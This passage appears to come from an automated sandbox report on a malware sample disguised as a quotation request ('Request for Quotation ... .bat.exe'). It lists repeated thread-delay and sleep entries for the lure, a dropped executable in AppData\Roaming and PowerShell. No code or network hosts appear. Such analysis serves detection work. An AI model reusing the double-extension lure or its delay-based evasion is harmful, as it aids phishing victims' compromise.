Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 595719	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 595172	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 594843	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 594720	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 594594	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 599541
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 599000
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 598890
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 598781
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 598672
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 598560
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 598453
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 598344
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 598219
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 598109
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 598000
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 597885
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 597781
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 597672
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 597562
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 597453
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 597344
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 597232
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 597125
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 597016
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 596891
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 596766
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 596656
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 596546
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 596437
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 596328
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 596219
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 596109
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 596000
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 595891
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 595766
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 595641
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 595531
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 595422
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 595312
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 595203
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 595094
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 594984
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 594875
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 594765
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 594656
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Thread delayed: delay time: 594547

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4920	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5746	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 664	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Window / User API: threadDelayed 1814	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Window / User API: threadDelayed 8049	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Window / User API: threadDelayed 1284
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Window / User API: threadDelayed 8573
Source: C:\Windows\System32\wbem\WMIADAP.exe	Window / User API: threadDelayed 1317
Source: C:\Windows\System32\wbem\WMIADAP.exe	Window / User API: threadDelayed 1251
Source: C:\Windows\System32\wbem\WMIADAP.exe	Window / User API: threadDelayed 851
Source: C:\Windows\System32\wbem\WMIADAP.exe	Window / User API: threadDelayed 1244
Source: C:\Windows\System32\wbem\WMIADAP.exe	Window / User API: threadDelayed 1094

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 3480	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6732	Thread sleep count: 4920 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7300	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 368	Thread sleep count: 216 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7224	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7332	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7256	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -27670116110564310s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7564	Thread sleep count: 1814 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -599874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7564	Thread sleep count: 8049 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -599655s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -599326s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -599107s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -598890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -598671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -598344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -598234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -598125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -598015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -597797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -597687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -597578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -597469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -597359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -597250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -597139s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -597031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -596922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -596812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -596703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -596594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -596484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -596375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -596265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -596156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -596047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -595937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -595828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -595719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -595609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -595500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -595390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -595281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -595172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -595062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -594953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -594843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -594720s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560	Thread sleep time: -594594s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7480	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep count: 31 > 30
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -28592453314249787s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7736	Thread sleep count: 1284 > 30
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -599891s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7736	Thread sleep count: 8573 > 30
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -599672s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -599541s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -599437s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -599328s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -599218s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -599109s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -599000s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -598890s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -598781s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -598672s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -598560s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -598453s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -598344s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -598219s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -598109s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -598000s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -597885s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -597781s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -597672s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -597562s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -597453s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -597344s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -597232s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -597125s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -597016s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -596891s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -596766s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -596656s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -596546s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -596437s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -596328s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -596219s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -596109s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -596000s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -595891s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -595766s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -595641s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -595531s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -595422s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -595312s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -595203s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -595094s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -594984s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -594875s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -594765s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -594656s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732	Thread sleep time: -594547s >= -30000s
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 6580	Thread sleep count: 1317 > 30
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 6580	Thread sleep count: 1251 > 30
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 6580	Thread sleep count: 851 > 30
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 6580	Thread sleep count: 1244 > 30
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 6580	Thread sleep count: 1094 > 30

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 599655	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 599326	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 599107	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 598234	Jump to behavior
